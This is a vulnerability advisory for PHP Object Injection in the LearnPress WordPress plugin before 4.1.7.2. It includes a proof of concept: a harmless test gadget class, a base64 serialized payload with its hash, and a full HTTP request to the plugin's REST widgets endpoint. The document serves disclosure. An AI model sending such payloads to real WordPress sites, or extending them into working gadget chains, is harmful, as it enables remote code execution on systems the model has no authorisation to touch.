The LearnPress WordPress plugin before 4.1.7.2 unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget is present, leadint to remote code execution (RCE). To successfully exploit this vulnerability attackers must have knowledge of the site secrets, allowing them to generate a valid hash via the wp_hash() function.
Proof of Concept:
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
payload:
{
"widget":"learnpress_widget_course_extra",
"instance":"Tzo0OiJFdmlsIjowOnt9Ow==",
"hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"
}
- instance is base64 encode of serialized object: O:4:”Evil”:0:{};
- hash is caculated by: wp_hash(base64_decode($instance ))
POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123
{
"widget":"learnpress_widget_course_extra",
"instance":"Tzo0OiJFdmlsIjowOnt9Ow==",
"hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"
}
Reference:
Leave a Reply